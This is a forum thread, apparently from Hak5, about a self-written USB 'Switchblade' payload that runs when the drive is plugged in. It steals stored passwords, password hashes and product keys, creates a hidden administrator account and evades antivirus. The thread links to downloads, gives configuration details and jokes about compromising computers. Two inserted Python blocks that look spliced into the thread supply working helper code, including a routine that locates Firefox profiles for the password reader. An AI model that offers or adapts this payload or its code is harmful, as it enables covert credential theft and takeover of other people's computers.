
Obi-Wahn's Switchblade


Obi-Wahn


Hello everybody!

Today I'm releasing my self-coded switchblade. It's a complete package, including all the tools needed.

Download U3P Package: http://www.autohotkey.net/~Obi-Wahn/hak5/m...Switchblade.u3p

Download Non-U3 Package with .exe: http://www.autohotkey.net/~Obi-Wahn/hak5/m...e_exe_nonu3.zip

Download Non-U3 Package with .bat: http://www.autohotkey.net/~Obi-Wahn/hak5/m...chblade_bat.zip

Download Manual (.pdf): http://www.autohotkey.net/~Obi-Wahn/hak5/m...de/swbl_man.pdf

Download Manual (.doc): http://www.autohotkey.net/~Obi-Wahn/hak5/m...de/swbl_man.doc

Info:

The U3 package works fully. The non-U3 packages (.exe and .bat) also work, but they are "quick and dirty" coded, so (especially for the .bat package) the downloader may want to check the source code again. I've only written these because not everyone wants to learn AHK or is able to "understand" AHK.

Post bugs and errors here, send a PM or an e-mail.

Feedback would be nice.

Regards

Obi-Wahn

EDIT: Sorry, I had to hurry yesterday.

My U3 Switchblade is written in AutoHotkey, which is similar to AutoIt.

How to install and configure this tool is described in the manual.

It is possible to:

Dump system information (including computer name, username, admin state of the user, system root, application, common application and ComSpec paths, operating system, language and screen resolution, plus a network information dump, all in one file)

Stop any kind of process

Copy the clipboard to a file

Dump Passwords from the Protected Storage

Dump Network passwords

Dump Messenger passwords

Dump mail passwords

Dump the IE history

Dump and decrypt passwords from Opera's wand file (if it exists; works at least up to version 9.10)

Dump product keys

Dump user password hashes

Dump dial-up passwords

Dump IE passwords

Dump wireless passwords

Dump the SID

Dump a list of installed software, including hotfixes

Dump a list of services

Dump a list of TCP connections

Dump and decrypt the ASP.NET account password

Create a new administrative user (username and password stored in the .ini), including German and English language support for the success report

Start additional programs stored in the .ini, including optional hidden start

Try to restart the terminated processes after finishing

Furthermore, it is possible to add computers (in combination with the username) to a "watchlist". If the computer with the current user is in the list, the program will exit without dumping any data.

It's possible to use the .exe without any other stuff as a standalone tool (the .ini is needed) for the process-terminate routine, the process-restart routine, the sysinfo and the user creation.

For standalone usage, read the manual or type "switchblade.exe /?"

Developers are also welcome. Type "switchblade.exe /Src" to append the source code to a file, or, if you use the .u3p package, hold CTRL down while starting the Switchblade. It will then append the source code to a file and exit.

All tools are included.


Hmm... I think .u3p can only work with a stock U3 drive. I guess I will have to find the restore .exe. Does this run automatically, or do you have to click a button? I haven't grabbed the manuals yet, so those will help. What does it do?


Sorry, I had to hurry yesterday. However, usage has been added to the first post.

Yes, the .u3p package has to be used with a stock U3 drive (which I use).

After installation of the U3 package, you have to go to the Manage Programs dialog and activate "start on insertion" for the Switchblade.

Then (without terminating and restarting processes) it takes about 45 seconds, depending on the computer, to dump all the information.

I've configured my switchblade not to kill and restart processes. I've only added this feature in case e.g. a scanner detects a tool as a virus, but when scanned with Avast, AVG and Norton, nothing happened.


Well, I just downloaded LPInstaller.exe and I am backing up my thumb drive, so soon I will be able to test this. In the meantime, I downloaded the .bat version and have to say that the code looks great. This is a really great payload.

EDIT: Yay! I installed it! I have a few questions for you: how do you configure what your computer is in the .u3p package? By "start on insertion", do you mean this: [screenshot]


After installation of the package, you have to start the Switchblade on your computer.

It'll create a hidden directory "Switchblade" on the writeable partition. There are two files in it: a process list and a .ini file.

In the .ini file, there's a section called MYCOMPUTERS. There you can add computers / users to ignore by adding lines like "index=Computername_Username".

On startup, it checks the section and, if it's plugged into a system with the matching Computername_Username combination, it'll exit.

Example:

[MYCOMPUTERS]
# If you want to add more Computer-User combinations,
# write one numbered entry per line. E.g.:
# 1=Computername_Username
# 2=...
# ...
1=OBI-WAHN_Andreas
2=ANDREAS_Obi-Wahn

This is my configuration. The #1 entry is filled in by starting the package the first time, so you have to plug it into your own computer when starting it for the first time.

Yes, I mean this dialog.

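The watchlist logic described in the post above, as an added example that is not part of the original AutoHotkey code: it parses a constructed copy of the [MYCOMPUTERS] section, builds the set of Computername_Username entries, and decides whether the payload should dump or exit. The .ini layout (numbered keys, '#' comment lines) is taken from the post; the case-insensitive comparison is an assumption of this example, since Windows host and account names are not case-sensitive, and the original may compare exactly.

```python
"""Watchlist check modelled on the Switchblade .ini [MYCOMPUTERS] section.

Added example, not the original Switchblade code. Assumes the layout shown
in the post: a [MYCOMPUTERS] section with numbered keys whose values are
"COMPUTERNAME_Username", plus full-line '#' comments.
"""
import configparser
import getpass
import os
import platform

# Constructed sample .ini mirroring the posted configuration.
SAMPLE_INI = """\
[MYCOMPUTERS]
# If you want to add more Computer-User combinations,
# write one numbered entry per line. E.g.:
# 1=Computername_Username
# 2=...
1=OBI-WAHN_Andreas
2=ANDREAS_Obi-Wahn
"""


def load_watchlist(ini_text):
    """Return the set of 'COMPUTER_user' entries from [MYCOMPUTERS]."""
    cp = configparser.ConfigParser(interpolation=None)  # '#' lines are comments by default
    cp.read_string(ini_text)
    if not cp.has_section("MYCOMPUTERS"):
        return set()
    return {v.strip() for v in cp["MYCOMPUTERS"].values() if v.strip()}


def is_watched(watchlist, computer, user):
    """True if this computer/user pair is on the list.

    Assumption of this example: compare case-insensitively, because Windows
    computer and account names are not case-sensitive.
    """
    wanted = f"{computer}_{user}".casefold()
    return any(entry.casefold() == wanted for entry in watchlist)


def should_dump(ini_text, computer, user):
    """Mirror the startup decision: False (exit) when watched, True (dump) otherwise."""
    return not is_watched(load_watchlist(ini_text), computer, user)


def current_identity():
    """%COMPUTERNAME% and the logged-on user on Windows; platform.node() elsewhere."""
    return os.environ.get("COMPUTERNAME", platform.node()), getpass.getuser()


if __name__ == "__main__":
    comp, user = current_identity()
    verdict = "dump" if should_dump(SAMPLE_INI, comp, user) else "skip (on watchlist)"
    print(f"{comp}_{user}: {verdict}")
```

Running it on the machine whose name and user appear as entry #1 prints "skip (on watchlist)", which is exactly the behaviour that left a later poster with no output when testing on his own laptop.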

Thanks, Obi-Wahn. I had never noticed the .ini file. It's all configured now; all I need to do is compromise some computers. :twisted: By the way, they have a ninja smiley on these boards! :ninja: It's so awesome.


@Charlie: Believe it or not, I was never on MySpace, so maybe your post is a joke (because of the "lol") or not. If not, show me a tool, and I'll try it.

@setzer: Actually, I've tested it only on AVG, Norman and Avast AV. And there wasn't any beep (according to ZA Firewall). And I've added an FF password reader, which works on a test installation of FF on my machine. Setting in the .ini file: section "DUMP", key "FFPasswords".


So none of the AVs pick this one up as of yet, even if you have it pull all the passwords? Also, would it be possible to add a Firefox password puller?


NOD32 detects the usual (dialupass.exe, pspv.exe). I'm assuming the only difference between your "tools" and other payloads is that you have used the most recent versions (e.g. mailpv.exe)?


I was just wondering (i.e. the MySpace pw). Your Switchblade seems to retrieve everything else :P. I'm still looking to see if there is a cookie stored for it or not. If not, then a keylogger is pretty much the only way, I guess... :?


Wow, you're really adamant about getting MySpace passwords. MySpace is no different from any other website, technologically speaking. I don't think I will extol the "virtues" of MySpace at this point in time. But, back to what I was talking about: if the user has the password set to autofill, LSA Secrets, IE Password, DeWand (UnWand?), or Firefox Password should grab it.


3 weeks later...

I just tried this one out, dude, and I gotta say, very nice job! :D

I did run into a little problem though. See, I was testing this on my other laptop, so when I ran the file the first time, it recorded my computer's name, and since it's set to skip over your own computer without dumping anything, the first 3 times I tried it I didn't get any output. Then I realized that I'm a moron and edited that option, and it worked great :D


5 weeks later...

I installed the U3 version of this. When I first opened it, it said "is this the first time using this program" or whatever; I clicked yes. Then nothing happened. I thought there was supposed to be like an .ini file and config file so I can change the options, but I don't know where it is. It's not on the flash drive.


The part where you click yes is so that it doesn't steal passwords on your own computer. To get to the config, go to the spot where the Documents part is and set your computer to show hidden files. There should be a file there that says "dump"; right-click it and tell it to open with Notepad, and there is the config you can change. Make sure you don't go into the Documents folder; go to where you see where it says Documents.


1 month later...

Hey Obi, I really like the way you made this thing so that it can be added to the LP on my U3, but I ran into a bit of a problem. See, I wanted to add the USB Hacksaw to that Switchblade you made, but I can't "just add Hacksaw to your existing Switchblade by copying the SBS folder inside the CMD folder and add the go.cmd to your current go.cmd" because there are no SBS or CMD folders. Do you think you could make a version of the USB Hacksaw that's similar to your version of the USB Switchblade? Because that would be awesome...

thanks in advance

--Skunkfoot


I do have a couple of questions.

1. Is the package installed to the non-writable portion of the U3 drive?

2. If an AV picks anything up, will it destroy the files or prevent them from running?

Also, in the folder where the dump is located, I see a bunch of ff_passwordsXX.txt files. When I open these files I see an error that states the following. What is this error?

Initialization failed , Make sure key3.db and cert8.db

files are present in the specified directory

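The error quoted above means the Firefox password reader was pointed at a profile directory that lacks the NSS key database (key3.db) and certificate database (cert8.db) it needs. As an added example, not code from the Switchblade or from the bundled reader, the following walks the classic Firefox profiles.ini, resolves each profile path, and reports which profiles are missing those files, so a payload can skip them instead of writing an error dump per profile. The profiles.ini layout (Profile sections with Path and IsRelative keys) is the long-standing Firefox format; the profile tree it scans is constructed in a temporary directory for the demonstration.

```python
"""Report which Firefox profiles carry key3.db and cert8.db.

Added example, not the Switchblade code. Assumes the classic profiles.ini
layout under the Firefox application-data directory ([ProfileN] sections
with Path= and IsRelative=). The sample tree is constructed for the demo.
"""
import configparser
import os
import tempfile

# Files the bundled reader's error message says it needs.
REQUIRED = ("key3.db", "cert8.db")


def profile_dirs(firefox_dir):
    """Yield absolute profile directories listed in <firefox_dir>/profiles.ini."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read(os.path.join(firefox_dir, "profiles.ini"))
    for section in cp.sections():
        if not section.lower().startswith("profile"):
            continue  # [General] and similar sections are not profiles
        path = cp[section].get("Path")
        if not path:
            continue
        if cp[section].get("IsRelative", "1") == "1":
            path = os.path.join(firefox_dir, path)
        yield os.path.normpath(path)


def missing_files(profile_dir):
    """List the required NSS database files absent from this profile."""
    return [f for f in REQUIRED if not os.path.isfile(os.path.join(profile_dir, f))]


def usable_profiles(firefox_dir):
    """Map each profile directory to its missing files; an empty list means usable."""
    return {p: missing_files(p) for p in profile_dirs(firefox_dir)}


def build_sample_tree():
    """Construct a fake Firefox directory: one complete profile, one lacking key3.db."""
    root = tempfile.mkdtemp()
    layout = (("Profiles/abc.default", REQUIRED), ("Profiles/xyz.test", ("cert8.db",)))
    for rel, files in layout:
        d = os.path.join(root, rel)
        os.makedirs(d)
        for name in files:
            open(os.path.join(d, name), "wb").close()  # empty placeholder files
    with open(os.path.join(root, "profiles.ini"), "w") as fh:
        fh.write("[General]\nStartWithLastProfile=1\n\n"
                 "[Profile0]\nName=default\nIsRelative=1\nPath=Profiles/abc.default\nDefault=1\n\n"
                 "[Profile1]\nName=test\nIsRelative=1\nPath=Profiles/xyz.test\n")
    return root


if __name__ == "__main__":
    for profile, missing in usable_profiles(build_sample_tree()).items():
        print(profile, "OK" if not missing else "missing: " + ", ".join(missing))
```

On a real machine, point usable_profiles() at the Firefox application-data directory (the one containing profiles.ini) and feed only the profiles that come back with an empty list to the password reader.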
